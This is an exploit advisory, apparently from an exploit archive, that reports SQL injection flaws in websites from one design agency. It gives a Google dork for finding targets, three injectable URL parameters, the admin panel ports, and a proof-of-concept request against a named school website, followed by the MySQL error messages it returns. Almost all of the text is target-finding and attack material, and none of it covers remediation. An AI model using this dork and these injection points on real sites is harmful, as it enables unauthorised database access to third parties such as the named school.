#################################################################################################
# Exploit Title : Design by Christian Bernal Development by Monoattack SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/10/2018
# Vendor Homepage : cbernalstudio.com ~ monoattack.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:''Design by Christian Bernal - Development by Monoattack'' site:ec
# Admin Panel Path :
TARGET:2083
TARGET:2096
# SQL Injection Exploit :
/interna.php?cupcod=[SQL Injection]
/manta/interna.php?cat=[SQL Injection]
/salinas/noticias.php?1&actual=[SQL Injection]
#################################################################################################
# Example Vulnerable Site => jefferson.edu.ec/interna.php?cupcod=1417%27 => [ Proof of Concept ] =>
# Example Vulnerable Site Admin Panel Paths => jefferson.edu.ec:2083 ~ jefferson.edu.ec:2096
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near '' AND cupcod IN (SELECT s.cupcod ' at line 3
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near ''' at line 3
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################